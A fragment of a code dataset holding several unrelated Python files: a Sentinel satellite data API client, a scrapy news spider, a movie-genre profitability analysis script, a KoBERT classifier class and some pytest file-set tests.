int(json_feed['opensearch:totalResults'])\n except (ValueError, KeyError):\n raise SentinelAPIError(http_status=response.status_code,\n msg='API response not valid. JSON decoding failed.',\n response_body=response.content)\n\n entries = json_feed.get('entry', [])\n # this verification is necessary because if the query returns only\n # one product, self.products will be a dict not a list\n if isinstance(entries, dict):\n entries = [entries]\n\n output = entries\n # repeat query until all results have been loaded\n if total_results > start_row + self.page_size - 1:\n output += self.load_query(query, start_row=(start_row + self.page_size))\n return output\n\n @staticmethod\n def to_geojson(products):\n \"\"\"Return the products from a query response as a GeoJSON with the values in their appropriate Python types.\n \"\"\"\n feature_list = []\n products_dict = SentinelAPI.to_dict(products, parse_values=False)\n for i, (title, props) in enumerate(products_dict.items()):\n props['title'] = title\n poly = _geojson_poly_from_wkt(props['footprint'])\n del props['footprint']\n del props['gmlfootprint']\n feature_list.append(\n geojson.Feature(geometry=poly, id=i, properties=props)\n )\n return geojson.FeatureCollection(feature_list)\n\n @staticmethod\n def to_dict(products, parse_values=True):\n \"\"\"Return the products from a query response as a dictionary with the values in their appropriate Python types.\n \"\"\"\n\n def convert_date(content):\n try:\n value = datetime.strptime(content, '%Y-%m-%dT%H:%M:%SZ')\n except ValueError:\n value = datetime.strptime(content, '%Y-%m-%dT%H:%M:%S.%fZ')\n return value\n\n if parse_values:\n converters = {'date': convert_date, 'int': int, 'float': float, 'double': float}\n else:\n converters = {}\n # Keep the string type by default\n default_converter = lambda x: x\n\n output = OrderedDict()\n for prod in products:\n product_dict = {}\n prodname = prod['title']\n output[prodname] = product_dict\n for key in prod:\n if key == 'title':\n continue\n if isinstance(prod[key], string_types):\n product_dict[key] = prod[key]\n else:\n properties = prod[key]\n if isinstance(properties, dict):\n properties = [properties]\n if key == 'link':\n for p in properties:\n name = 'link'\n if 'rel' in p:\n name = 'link_' + p['rel']\n product_dict[name] = p['href']\n else:\n f = converters.get(key, default_converter)\n for p in properties:\n product_dict[p['name']] = f(p['content'])\n\n return output\n\n @staticmethod\n def to_dataframe(products):\n \"\"\"Return the products from a query response as a Pandas DataFrame with the values in their appropriate Python types.\n \"\"\"\n import pandas as pd\n\n products_dict = SentinelAPI.to_dict(products)\n return pd.DataFrame.from_dict(products_dict, orient='index')\n\n @staticmethod\n def to_geodataframe(products):\n \"\"\"Return the products from a query response as a GeoPandas GeoDataFrame with the values in their appropriate Python types.\n \"\"\"\n import geopandas as gpd\n import shapely.wkt\n\n df = SentinelAPI.to_dataframe(products)\n crs = {'init': 'epsg:4326'} # WGS84\n geometry = [shapely.wkt.loads(fp) for fp in df['footprint']]\n # remove useless columns\n df.drop(['footprint', 'gmlfootprint'], axis=1, inplace=True)\n return gpd.GeoDataFrame(df, crs=crs, geometry=geometry)\n\n def get_product_odata(self, id):\n \"\"\"Access SciHub OData API to get info about a Product. Returns a dict\n containing the id, title, size, md5sum, date, footprint and download url\n of the Product. The date field receives the Start ContentDate of the API.\n \"\"\"\n\n response = self.session.get(\n urljoin(self.api_url, \"odata/v1/Products('%s')/?$format=json\" % id)\n )\n _check_scihub_response(response)\n\n d = response.json()['d']\n\n # parse the GML footprint to same format as returned\n # by .get_coordinates()\n geometry_xml = ET.fromstring(d[\"ContentGeometry\"])\n poly_coords_str = geometry_xml \\\n .find('{http://www.opengis.net/gml}outerBoundaryIs') \\\n .find('{http://www.opengis.net/gml}LinearRing') \\\n .findtext('{http://www.opengis.net/gml}coordinates')\n poly_coords = (coord.split(\",\")[::-1] for coord in poly_coords_str.split(\" \"))\n coord_string = \",\".join(\" \".join(coord) for coord in poly_coords)\n\n values = {\n 'id': d['Id'],\n 'title': d['Name'],\n 'size': int(d['ContentLength']),\n 'md5': d['Checksum']['Value'],\n 'date': _convert_timestamp(d['ContentDate']['Start']),\n 'footprint': coord_string,\n 'url': urljoin(self.api_url, \"odata/v1/Products('%s')/$value\" % id)\n }\n return values\n\n def download(self, id, directory_path='.', checksum=False, check_existing=False, **kwargs):\n \"\"\"Download a product using homura.\n\n Uses the filename on the server for the downloaded file, e.g.\n \"S1A_EW_GRDH_1SDH_20141003T003840_20141003T003920_002658_002F54_4DD1.zip\".\n\n Incomplete downloads are continued and complete files are skipped.\n\n Further keyword arguments are passed to the homura.download() function.\n\n Parameters\n ----------\n id : string\n UUID of the product, e.g. 'a8dd0cfd-613e-45ce-868c-d79177b916ed'\n directory_path : string, optional\n Where the file will be downloaded\n checksum : bool, optional\n If True, verify the downloaded file's integrity by checking its MD5 checksum.\n Throws InvalidChecksumError if the checksum does not match.\n Defaults to False.\n check_existing : bool, optional\n If True and a fully downloaded file with the same name exists on the disk,\n verify its integrity using its MD5 checksum. Re-download in case of non-matching checksums.\n Defaults to False.\n\n Returns\n -------\n path : string\n Disk path of the downloaded file,\n product_info : dict\n Dictionary containing the product's info from get_product_info().\n\n Raises\n ------\n InvalidChecksumError\n If the MD5 checksum does not match the checksum on the server.\n \"\"\"\n # Check if API is reachable.\n product_info = None\n while product_info is None:\n try:\n product_info = self.get_product_odata(id)\n except SentinelAPIError as e:\n self.logger.info(\"Invalid API response:\\n{}\\nTrying again in 1 minute.\".format(str(e)))\n sleep(60)\n\n path = join(directory_path, product_info['title'] + '.zip')\n kwargs = _fillin_cainfo(kwargs)\n\n self.logger.info('Downloading %s to %s' % (id, path))\n\n # Check if the file exists and passes md5 test\n # Homura will by default continue the download if the file exists but is incomplete\n if exists(path) and getsize(path) == product_info['size']:\n if not check_existing or _md5_compare(path, product_info['md5']):\n self.logger.info('%s was already downloaded.' % path)\n return path, product_info\n else:\n self.logger.info(\n '%s was already downloaded but is corrupt: checksums do not match. Re-downloading.' % path)\n remove(path)\n\n if (exists(path) and getsize(path) >= 2 ** 31 and\n pycurl.version.split()[0].lower() <= 'pycurl/7.43.0'):\n # Workaround for PycURL's bug when continuing > 2 GB files\n # https://github.com/pycurl/pycurl/issues/405\n remove(path)\n\n homura.download(product_info['url'], path=path, auth=self.session.auth,\n user_agent=self.user_agent, **kwargs)\n\n # Check integrity with MD5 checksum\n if checksum is True:\n if not _md5_compare(path, product_info['md5']):\n raise InvalidChecksumError('File corrupt: checksums do not match')\n return path, product_info\n\n def download_all(self, products, directory_path='.', max_attempts=10, checksum=False, check_existing=False,\n **kwargs):\n \"\"\"Download all products returned in query().\n\n File names on the server are used for the downloaded files, e.g.\n \"S1A_EW_GRDH_1SDH_20141003T003840_20141003T003920_002658_002F54_4DD1.zip\".\n\n In case of interruptions or other exceptions, downloading will restart from where it left off.\n Downloading is attempted at most max_attempts times to avoid getting stuck with unrecoverable errors.\n\n Parameters\n ----------\n products : list\n List of products returned with self.query()\n directory_path : string\n Directory where the downloaded files will be downloaded\n max_attempts : int, optional\n Number of allowed retries before giving up downloading a product. Defaults to 10.\n\n Other Parameters\n ----------------\n See download().\n\n Returns\n -------\n dict[string, dict|None]\n A dictionary with an entry for each product mapping the downloaded file path to its product info\n (returned by get_product_info()). Product info is set to None if downloading the product failed.\n \"\"\"\n result = {}\n self.logger.info(\"Will download %d products\" % len(products))\n for i, product in enumerate(products):\n path = join(directory_path, product['title'] + '.zip')\n product_info = None\n download_successful = False\n remaining_attempts = max_attempts\n while not download_successful and remaining_attempts > 0:\n try:\n path, product_info = self.download(product['id'], directory_path, checksum, check_existing,\n **kwargs)\n download_successful = True\n except (KeyboardInterrupt, SystemExit):\n raise\n except InvalidChecksumError:\n self.logger.warning(\"Invalid checksum. The downloaded file '{}' is corrupted.\".format(path))\n except:\n self.logger.exception(\"There was an error downloading %s\" % product['title'])\n remaining_attempts -= 1\n result[path] = product_info\n self.logger.info(\"{}/{} products downloaded\".format(i + 1, len(products)))\n return result\n\n @staticmethod\n def get_products_size(products):\n \"\"\"Return the total filesize in GB of all products in the query\"\"\"\n size_total = 0\n for product in products:\n size_product = next(x for x in product[\"str\"] if x[\"name\"] == \"size\")[\"content\"]\n size_value = float(size_product.split(\" \")[0])\n size_unit = str(size_product.split(\" \")[1])\n if size_unit == \"MB\":\n size_value /= 1024.\n if size_unit == \"KB\":\n size_value /= 1024. * 1024.\n size_total += size_value\n return round(size_total, 2)\n\n def _format_url(self, start_row=0):\n blank = 'search?format=json&rows={rows}&start={start}'.format(\n rows=self.page_size, start=start_row\n )\n return urljoin(self.api_url, blank)\n\n\nclass SentinelAPIError(Exception):\n \"\"\"Invalid responses from SciHub.\n \"\"\"\n\n def __init__(self, http_status=None, code=None, msg=None, response_body=None):\n self.http_status = http_status\n self.code = code\n self.msg = msg\n self.response_body = response_body\n\n def __str__(self):\n return '(HTTP status: {0}, code: {1}) {2}'.format(\n self.http_status, self.code,\n ('\\n' if '\\n' in self.msg else '') + self.msg)\n\n\nclass InvalidChecksumError(Exception):\n \"\"\"MD5 checksum of local file does not match the one from the server.\n \"\"\"\n pass\n\n\ndef get_coordinates(geojson_file, feature_number=0):\n \"\"\"Return the coordinates of a polygon of a GeoJSON file.\n\n Parameters\n ----------\n geojson_file : str\n location of GeoJSON file_path\n feature_number : int\n Feature to extract polygon from (in case of MultiPolygon\n FeatureCollection), defaults to first Feature\n\n Returns\n -------\n polygon coordinates\n string of comma separated coordinate tuples (lon, lat) to be used by SentinelAPI\n \"\"\"\n geojson_obj = geojson.loads(open(geojson_file, 'r').read())\n coordinates = geojson_obj['features'][feature_number]['geometry']['coordinates'][0]\n # precision of 7 decimals equals 1mm at the equator\n coordinates = ['%.7f %.7f' % (coord[0], coord[1]) for coord in coordinates]\n return ','.join(coordinates)\n\n\ndef _fillin_cainfo(kwargs_dict):\n \"\"\"Fill in the path of the PEM file containing the CA certificate.\n\n The priority is: 1. user provided path, 2. path to the cacert.pem\n bundle provided by certifi (if installed), 3. let pycurl use the\n system path where libcurl's cacert bundle is assumed to be stored,\n as established at libcurl build time.\n \"\"\"\n try:\n cainfo = kwargs_dict['pass_through_opts'][pycurl.CAINFO]\n except KeyError:\n try:\n cainfo = certifi.where()\n except AttributeError:\n cainfo = None\n\n if cainfo is not None:\n pass_through_opts = kwargs_dict.get('pass_through_opts', {})\n pass_through_opts[pycurl.CAINFO] = cainfo\n kwargs_dict['pass_through_opts'] = pass_through_opts\n\n return kwargs_dict\n\n\ndef _format_date(in_date):\n \"\"\"Format date or datetime input or a YYYYMMDD string input to\n YYYY-MM-DDThh:mm:ssZ string format. In case you pass an\n \"\"\"\n\n if type(in_date) == datetime or type(in_date) == date:\n return in_date.strftime('%Y-%m-%dT%H:%M:%SZ')\n else:\n try:\n return datetime.strptime(in_date, '%Y%m%d').strftime('%Y-%m-%dT%H:%M:%SZ')\n except ValueError:\n return in_date\n\n\ndef _convert_timestamp(in_date):\n \"\"\"Convert the timestamp received from OData JSON API, to\n YYYY-MM-DDThh:mm:ssZ string format.\n \"\"\"\n in_date = int(in_date.replace('/Date(', '').replace(')/', '')) / 1000.\n return _format_date(datetime.utcfromtimestamp(in_date))\n\n\ndef _check_scihub_response(response):\n \"\"\"Check that the response from server has status code 2xx and that the response is valid JSON.\"\"\"\n try:\n response.raise_for_status()\n response.json()\n except (requests.HTTPError, ValueError) as e:\n msg = \"API response not valid. JSON decoding failed.\"\n code = None\n try:\n msg = response.json()['error']['message']['value']\n code = response.json()['error']['code']\n except:\n if not response.text.rstrip().startswith('{'):\n try:\n h = html2text.HTML2Text()\n h.ignore_images = True\n h.ignore_anchors = True\n msg = h.handle(response.text).strip()\n except:\n pass\n api_error = SentinelAPIError(response.status_code, code, msg, response.content)\n # Suppress \"During handling of the above exception...\" message\n # See PEP 409\n api_error.__cause__ = None\n raise api_error\n\n\ndef _geojson_poly_from_wkt(wkt):\n \"\"\"Return a geojson Polygon object from a WKT string\"\"\"\n coordlist = re.search(r'\\(\\s*([^()]+)\\s*\\)', wkt).group(1)\n coord_list_split = (coord.split(' ') for coord in coordlist.split(','))\n poly = geojson.Polygon([(float(coord[0]), float(coord[1])) for coord in coord_list_split])\n return poly\n\n\ndef _md5_compare(file_path, checksum, block_size=2 ** 13):\n \"\"\"Compare a given md5 checksum with one calculated from a file\"\"\"\n md5 = hashlib.md5()\n with open(file_path, \"rb\") as f:\n progress = tqdm(desc=\"MD5 checksumming\", total=getsize(file_path), unit=\"B\", unit_scale=True)\n while True:\n block_data = f.read(block_size)\n if not block_data:\n break\n md5.update(block_data)\n progress.update(len(block_data))\n progress.close()\n return md5.hexdigest().lower() == checksum.lower()\n","repo_name":"HKCaesar/sentinelsat","sub_path":"sentinelsat/sentinel.py","file_name":"sentinel.py","file_ext":"py","file_size_in_byte":20751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"41016214923","text":"import scrapy\nimport requests\nimport json\nimport time \n\nclass VcbeatSpider(scrapy.Spider):\n name = \"vcbeat\"\n\n def start_requests(self):\n article_list_url = 'http://www.vcbeat.net/Index/Index/ajaxGetArticleList'\n article_url = 'http://www.vcbeat.net'\n categoryId = '2999'\n page = 1\n while True:\n res = requests.post(article_list_url, \n data = {'categoryId':categoryId, 'page':page})\n print('page: ', page)\n while res.status_code == 404:\n print('@@@@@ retry')\n time.sleep(3)\n res = requests.post(article_list_url, \n data = {'categoryId':categoryId, 'page':page})\n content = json.loads(res.content.decode('utf-8-sig'))\n if content['status'] != 1:\n break\n data = content['data']\n for item in data:\n yield scrapy.Request(url=f'''{article_url}/{item['id']}''', \n callback=self.parse(item['publish_time'], item['title']))\n page += 1\n\n\n\n def parse(self, date, title):\n def lam(response):\n content = response.xpath('//div[@class=\"row\"]/div[@id=\"article-detail\"]/div[@id=\"article-content\"]/p/span/text()').extract()\n content.extend(response.xpath('//div[@class=\"row\"]/div[@id=\"article-detail\"]/div[@id=\"article-content\"]/p/text()').extract())\n content.extend(response.xpath('//div[@class=\"row\"]/div[@id=\"article-detail\"]/div[@id=\"article-content\"]/sector/p/text()').extract())\n content.extend(response.xpath('//div[@class=\"row\"]/div[@id=\"article-detail\"]/div[@id=\"article-content\"]/section/p/text()').extract())\n cntx = ''.join(content)\n filename = f'{date}:{title}.txt'\n with open(f'vcbeat/{filename}', 'w') as f:\n f.write(cntx)\n self.log('Saved file %s' % filename)\n return lam","repo_name":"quheng/chalk","sub_path":"spider/spider/spiders/vcbeat.py","file_name":"vcbeat.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16858312149","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Sussex Budget Productions: Data Insights and Reccomendations for Future Investment 2021\n# \n\n# <b>Student Number: 244799<b>\n# \n# \n\n# This report investigates profitability of movie genres 2000-2016 to advise Sussex Budget Productions on recommendations for future film ventures.\n# Based on the company aims to gain 1.5million funding, the potential revenue of the analysis recommendations will be projected and thus can be used in consultations with investors.<br />\n# <br />\n# The beginning of the report will clean and explore of movie data to propose targeted analytical ideas.\n# <br />\n# Based on the insights derived from the overview, hypotheses on the genres likely to bring us the most profit are constructed and tested statistically.\n# <br /> \n# Following the analysis, recommendations will be stated in the summary. All analysis will be run in the Python programming language.\n\n# ### Data Import and Cleaning\n\n# In[12]:\n\n\n#Import programming packages\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nimport scipy.stats as stats\n\nMovieFile = 'movie_metadata.csv'\n\n#Read movie data into DataFrame\nRawData = pd.read_csv(MovieFile,index_col=None)\nprint(RawData.head(10))\n\n\n# Below shows basic attributes of the dataset; the number of movies included, the columns (measures) available which can be used as parameters in the analysis, and the years of movie creation.\n\n# In[3]:\n\n\n#Get number of movies\nShape=RawData.shape\nprint(\"The number of movies in the dataset is: \"+ str(Shape[0]))\n\n#Print columns\nprint(\"\\nThe following columns are available in the data set:\\n\")\nfor Col in RawData.columns:\n print(Col)\n \n#Print Year range\nYearMin=int(np.min(RawData.title_year))\nYearMax=int(np.max(RawData.title_year))\nprint(\"\\nThe data has been taken from the years: \"+str(YearMin)+\" and \"+str(YearMax))\n\n\n# There is plenty of information provided about the movies seen in the columns printed above, including the directors of the movie, facebook likes, countries and genres. There is also a large number of movies (5043) to analyse with release dates from 1916 to 2016. \n# \n# To keep the insights relevant to 2021 demographics and trends, only movies released after in or after 2000 will be used in the analysis.\n\n# In[4]:\n\n\n#Create subset of the data with movies from 2000 onwards\nRecentData=RawData[RawData['title_year']>=2000]\nRecShape=RecentData.shape\nprint(\"The number of movies in the dataset produced after 2000 are: \"+str(RecShape[0]))\n\n\n# ### Exploratory Data Analysis\n\n# Next, trends of movies left in the dataset are shown by plotting the frequencies of movies 2000-2016 on bar graphs by country, content rating, genre types and year.\n\n# In[5]:\n\n\n#Plot Country Frequency\nplt.subplots(2,2, figsize=(10,7))\nplt.suptitle(\"Frequencies of Movies 2000-2016\", fontsize=16)\nplt.subplot(2,2,1)\n\nxCountries=RecentData['country'].unique()\nCountryFreq=RecentData.groupby('country')['imdb_score'].count()\nCountryFreq=CountryFreq.sort_values(ascending=False)\nCountryFreq=CountryFreq[0:10]\n\nplt.bar(CountryFreq.index,CountryFreq)\nplt.title(\"Frequency of Top 10 Countries\")\nplt.xticks(rotation=90)\n\n#Plot Rating Frequency\nplt.subplot(2,2,2)\n\nxContentRating=RecentData['content_rating'].unique()\nContentRatingFreq=RecentData.groupby('content_rating')['imdb_score'].count()\nContentRatingFreq=ContentRatingFreq.sort_values(ascending=False)\n\nplt.bar(ContentRatingFreq.index,ContentRatingFreq,color='lightblue')\nplt.title(\"Frequency by Content Rating\")\nplt.xticks(rotation=90)\n\n#Plot Genre Frequency\nplt.subplot(2,2,3)\n\nGenreAll = []\nfor line in RecentData['genres']:\n x = line.split(\"|\")\n for m in x:\n GenreAll.append(m)\n \nGenreDict=dict(sorted((x,GenreAll.count(x)) for x in set(GenreAll)))\nSortedGenre=sorted(GenreDict.items(), key=lambda x: x[1],reverse=True)\nSortedGenreDict={}\nfor item in SortedGenre:\n SortedGenreDict[item[0]]=item[1]\nplt.bar(SortedGenreDict.keys(),SortedGenreDict.values(),color='cadetblue')\n\nplt.xticks(rotation=90)\nplt.title(\"Frequency by Genre Types\")\n\n#Plot Year Frequency\nplt.subplot(2,2,4)\n\nxYear=RecentData['title_year'].unique()\nYearFreq=RecentData.groupby('title_year')['imdb_score'].count()\nYearFreq=YearFreq.sort_values(ascending=False)\nYearFreq.index=YearFreq.index.astype(int) \n\nplt.bar(sorted(YearFreq.index.astype(int)),YearFreq,color='darkslategrey')\nplt.title(\"Frequency by Year\")\nplt.xticks(rotation=90)\n\nplt.tight_layout()\nplt.show()\n\n\n# Further context is needed to show if any categories of the demographics in the above charts lead to more successful movies.\n# Success will be measured by profitability. However, taking the 'gross revenue' alone misses the full picture of movie investment. Therefore, our measure of profitability will be gross revenue as a percentage of budget spent. Thus, if a film budget was 1million and gross revenue was 2million, then the gross revenue as a percentage of budget would be 200%.\n# <br/><br/>\n# The focus will be on the top five most frequent genres and explore if any of these show increased profitability. \n# <br/><br/>\n# First, the association between budget and gross revenue will be explored to confirm if the suggested measure of gross revenue as a percentage of budget makes sense. These parameters are plotted on a scatter graph and the Pearson's coefficient, a measure which tells us the relatedness of two linear variables and is a number between 0 and 1, is calculated.\n# \n\n# In[5]:\n\n\n#Plot scatter graph for log budget vs. log gross net revenue\nplt.scatter(np.log10(RecentData['budget']),np.log10(RecentData['gross']), s=1, c=\"darkgrey\")\nplt.xlabel(\"Log10 of Movie Budget\")\nplt.ylabel(\"Log10 of Gross Revenue of Movie\")\nplt.title(\"Relationship between Movie Budget and Gross Revenue: 2000-2016\")\n\nplt.show()\n\n\n# In[6]:\n\n\n#Calculate the Pearson's Coefficient\nBudgRev=RecentData[['budget','gross']].dropna()\nPearsonsCoeff=stats.pearsonr(np.array(np.log10(BudgRev['budget'])),np.array(np.log10(BudgRev['gross'])))\nprint(\"The Pearson's Coefficient for budget and gross revenue is: {}\".format(PearsonsCoeff[1]))\n\n\n# Since the coefficient is <0.05, there is a low probability that the correlation between budget and gross revenue is due to chance and therefore it is highly likely that an increased movie budget leads to an increased gross revenue. <br/><br/>\n# A column is added to our dataset, giving the gross revenue as a percentage of film budget, which will be used as the measure of profitability.\n\n# In[7]:\n\n\nRecentData['Rev%Budget']=(RecentData['gross']/RecentData['budget'])*100\n\n\n# ### Hypothesis Testing: Has any of the top 5 most frequent genres of movies made significantly more profit in 2000-2016?\n\n# As seen in the exploratory data analysis, the five most frequently made genre of movie 2000-2016 made was:\n\n# In[8]:\n\n\n#Print tpp 5 movies\nTop5Movies=list(SortedGenreDict.keys())[:5]\nfor i in Top5Movies:\n print(i)\n\n\n# These will be tested to see if genre impacts profitability. If the genre of a movie impacts profitability, then movies of some genres should have a higher gross profit as a percentage of budget than movies exclusive of that genre. The hypothesis is that at least one of the five most frequently made movie genres will be significantly more profitable. The null hypothesis is that genre does not impact profitability.\n# \n# Subsets of the dataset are created for each genre, and a corresponding dataset for all movies that do not contain the genre are created for comparison.\n\n# In[9]:\n\n\nTop5Data={}\n\nfor x in Top5Movies:\n (GenreData,NonGenreData)=RecentData[RecentData['genres'].str.contains(x)],RecentData[~RecentData['genres'].str.contains(x)]\n Top5Data[x]=(GenreData,NonGenreData)\n\n\n# Next, a box plot and summary table is created to give an overview of the means and spread of the gross revenue as a percentage of budget.\n\n# In[24]:\n\n\n#Remove the entries where there is no value for Rev%Budget\nBoxPlotData={}\nfor x,y in Top5Data.items():\n RemoveNaN=y[0]['Rev%Budget'][~np.isnan(y[0]['Rev%Budget'])].tolist()\n BoxPlotData[x]=RemoveNaN\nBoxPlotData['All Movies']=RecentData['Rev%Budget'][~np.isnan(RecentData['Rev%Budget'])].tolist()\n\n#Plot the boxplot\nFig,Ax=plt.subplots()\nboxprops = dict(linewidth=2, color='black')\nmedianprops = dict(linestyle='-', linewidth=2.5, color='teal')\nAx.boxplot((np.log10(BoxPlotData['Drama']),np.log10(BoxPlotData['Comedy']),np.log10(BoxPlotData['Thriller']),np.log10(BoxPlotData['Action']),np.log10(BoxPlotData['Romance']),np.log10(BoxPlotData['All Movies'])),boxprops=boxprops,medianprops=medianprops)\nAx.set_xticklabels(BoxPlotData.keys())\nAx.set_title(\"Boxplots of logs of revenue as a percentage of budget, by Top 5 Genre\")\nAx.set_ylabel(\"Log(Revenue as % of Budget)\")\nplt.show()\n\n#Create summaritive table\nfor w,z in BoxPlotData.items():\n Series=pd.Series(z)\n BoxPlotData[w]=Series\n\nSubDf=pd.DataFrame(BoxPlotData)\ndisplay(SubDf.describe().round(2))\n\n\n# Since the maximum values seem exceptionally high, it is likely there has been some errors in data entry in the gross revenue or budget values entered. Subsequently, entries that have more than 2000% gross revenue as a percentage of budget will be removed.\n\n# In[10]:\n\n\n#Remove all entries where there is over 2000% revenue as a percentage of budget\nRecentData2=RecentData[RecentData['Rev%Budget']<=2000]\nTop5Data2={}\nTop5DataFull={}\n\nfor x in Top5Movies:\n SubData,NotSubData=RecentData2[RecentData2['genres'].str.contains(x)],RecentData2[~RecentData2['genres'].str.contains(x)]\n SubDataS=pd.Series(SubData['Rev%Budget'])\n Top5Data2[x]=SubDataS\n Top5DataFull[x]=SubData,NotSubData\n\nTop5Data2['All Movies']=RecentData2['Rev%Budget']\nSubDf2=pd.DataFrame(Top5Data2)\ndisplay(SubDf2.describe().round(2))\n\n\n# Next, each of the five genres is tested in a t-test against all other remaining movies significantly to see if there is a significant difference in profitability.\n\n# In[11]:\n\n\n#Dictionary to store P Values\nGenreSigOutcomes={}\n\n#This function gets the p value from the t test by calculating the mean, standard deviation and error\ndef TestSamples(G1,G2,Name):\n \n SizeGenre,SizeOther=len(G1),len(G2)\n MeanGenre,MeanOther=np.mean(G1),np.mean(G2)\n StdGenre,StdOther=np.std(G1),np.std(G2)\n ErrorGenre,ErrorOther=StdGenre/np.sqrt(G1),StdOther/np.sqrt(G2)\n\n GenreVsOtherTest=stats.ttest_ind_from_stats(MeanGenre,StdGenre,SizeGenre,MeanOther,StdOther,SizeOther,equal_var=False)\n OneTailDiff=GenreVsOtherTest.pvalue/2\n GenreSigOutcomes={}\n return OneTailDiff\n print ('P-value for Drama vs. Other Movies is {}'.format(OneTailDiff))\n\nfor i,j in Top5DataFull.items():\n PValue=TestSamples(j[0]['Rev%Budget'],j[1]['Rev%Budget'],i)\n GenreSigOutcomes[i]=pd.Series(PValue)\n \nPvalueDf=pd.DataFrame(GenreSigOutcomes)\nprint(\"The p values for the 5 genres:\")\ndisplay(PvalueDf)\n\n\n# Out of the five genres tested, all but one showed a significant differences (p<0.05). This means the null hypothesis can already be rejected and that genre does impact profitability in some way. Considering the mean profitability (155.41%) of all movies, we can conclude that:\n# - Dramas (p=0.233) are not significantly differential.\n# - Comedies (p=0.003, mean=169.29) are a significantly more profitable genre.\n# - Thrillers (p=0.003, mean=177.65) are a significantly more profitable genre.\n# - Action (p=3.5 x 10^-18, mean=111.42) is a significantly less profitable genre.\n# - Romance (p=0.039, mean=169.71) is a significantly more profitable genre.\n\n# # Summary\n\n# Taking the top five most frequent genres of movies 2000-2016, it was found that comedy, thriller and romance movies were significantly more profitable than all movies not associated with each respective genre. Therefore, investing in movie proposals within these genre domains is very much advised for increased profitability.\n# If a 500,000 budget was delegated to each of these three genres, taking their mean gross revenue as a percentage of budget, an expected 2.6million gross profit is expected (500,000 x 1.6929 + 500,000 x 1.7765 + 500,000 x 1.6971), a net gain of 1.1million.\n# <br/><br/>\n# Contrastingly, drama movies showed no difference in profitability compared with non-dramas and action movies were significantly less profitable than non-action movies. It should be noted that the means of each of these over 100% means they are still on average profitable investments, but seem to demand more budget that does not lead to profitable outcomes.\n# <br/><br/>\n# There is opportunity for deeper and more accurate analysis surrounding genre based profitability. For example, reducing the number of genres listed per film since some in the dataset listed many genres. However conclusively comedy, thriller and romance have proved the most profitable and action movies the least.\n# \n# \n# \n\n# In[ ]:\n\n\n\n\n","repo_name":"stephanie-mathias/Movie-Business-Recommendations","sub_path":"DSRM2_Student244799.py","file_name":"DSRM2_Student244799.py","file_ext":"py","file_size_in_byte":12816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18135895343","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\nimport gluonnlp as nlp\nimport numpy as np\nfrom tqdm import tqdm, tqdm_notebook\n\nfrom kobert.utils import get_tokenizer\nfrom kobert.pytorch_kobert import get_pytorch_kobert_model\n\nfrom transformers import AdamW\nfrom transformers.optimization import get_cosine_schedule_with_warmup\n\n# 모델 파라미터 설정\n# 토큰의 최대 길이라고 생각\nmax_len = 64\n# 몇 개의 샘플들을 예측해보고 가중치를 업데이트 할 지 설정\n# 아래와 같이 배치 사이즈가 64인 경우 데이터 64개 마다 예측한 것을 실제 값과 비교한다\nbatch_size = 64\nwarmup_ratio = 0.1\n# epoch 횟수는 모델이 전체 데이터셋을 훈련시킬 횟수를 의미한다.\nnum_epochs = 10\nmax_grad_norm = 1\nlog_interval = 200\n# learning_rate 값이 너무 크면 원하는 값에 도달하기 힘들고, 너무 작으면 학습기간이 오래 걸린다.\nlearning_rate = 5e-5\n\n# 학습에 사용할 데이터 셋 클래스 선언\nclass BERTDataset(Dataset):\n def __init__(self, dataset, sent_idx, label_idx, bert_tokenizer, max_len,\n pad, pair):\n transform = nlp.data.BERTSentenceTransform(\n bert_tokenizer, max_seq_length=max_len, pad=pad, pair=pair)\n\n self.sentences = [transform([i[sent_idx]]) for i in dataset]\n self.labels = [np.int32(i[label_idx]) for i in dataset]\n\n def __getitem__(self, i):\n return (self.sentences[i] + (self.labels[i], ))\n\n def __len__(self):\n return (len(self.labels))\n\n\n # 분류에 사용할 모델 클래스 선언\nclass BERTClassifier(nn.Module):\n def __init__(self,\n bert,\n hidden_size = 768,\n # num_classes는 카테고리의 개수를 의미한다. (현재 데이터셋의 경우 3개의 분류로 데이터셋이 구성되어 있음)\n num_classes=100,\n dr_rate=None,\n params=None):\n super(BERTClassifier, self).__init__()\n self.bert = bert\n self.dr_rate = dr_rate\n \n self.classifier = nn.Linear(hidden_size , num_classes)\n if dr_rate:\n self.dropout = nn.Dropout(p=dr_rate)\n \n def gen_attention_mask(self, token_ids, valid_length):\n attention_mask = torch.zeros_like(token_ids)\n for i, v in enumerate(valid_length):\n attention_mask[i][:v] = 1\n return attention_mask.float()\n\n def forward(self, token_ids, valid_length, segment_ids):\n attention_mask = self.gen_attention_mask(token_ids, valid_length)\n \n _, pooler = self.bert(input_ids = token_ids, token_type_ids = segment_ids.long(), attention_mask = attention_mask.float().to(token_ids.device))\n if self.dr_rate:\n out = self.dropout(pooler)\n return self.classifier(out)","repo_name":"ukjinlee66/jeju_tourist_recommend","sub_path":"recommend server/myclass.py","file_name":"myclass.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"10182009134","text":"import pytest\n\n\ndef test_files_link(testapp, sequence_file, reference_file, measurement_set):\n testapp.patch_json(\n sequence_file['@id'],\n {\n 'file_set': measurement_set['@id']\n }\n )\n testapp.patch_json(\n reference_file['@id'],\n {\n 'file_set': measurement_set['@id']\n }\n )\n res = testapp.get(measurement_set['@id'])\n assert set([file_id['@id'] for file_id in res.json.get('files')]) == {sequence_file['@id'], reference_file['@id']}\n testapp.patch_json(\n sequence_file['@id'],\n {\n 'status': 'deleted'\n }\n )\n res = testapp.get(measurement_set['@id'])\n assert set([file_id['@id'] for file_id in res.json.get('files')]) == {reference_file['@id']}\n\n\ndef test_control_link(testapp, measurement_set, curated_set_genome):\n testapp.patch_json(\n measurement_set['@id'],\n {\n 'control_file_sets': [curated_set_genome['@id']]\n }\n )\n res = testapp.get(curated_set_genome['@id'])\n assert set([file_set_id['@id'] for file_set_id in res.json.get('control_for')]) == 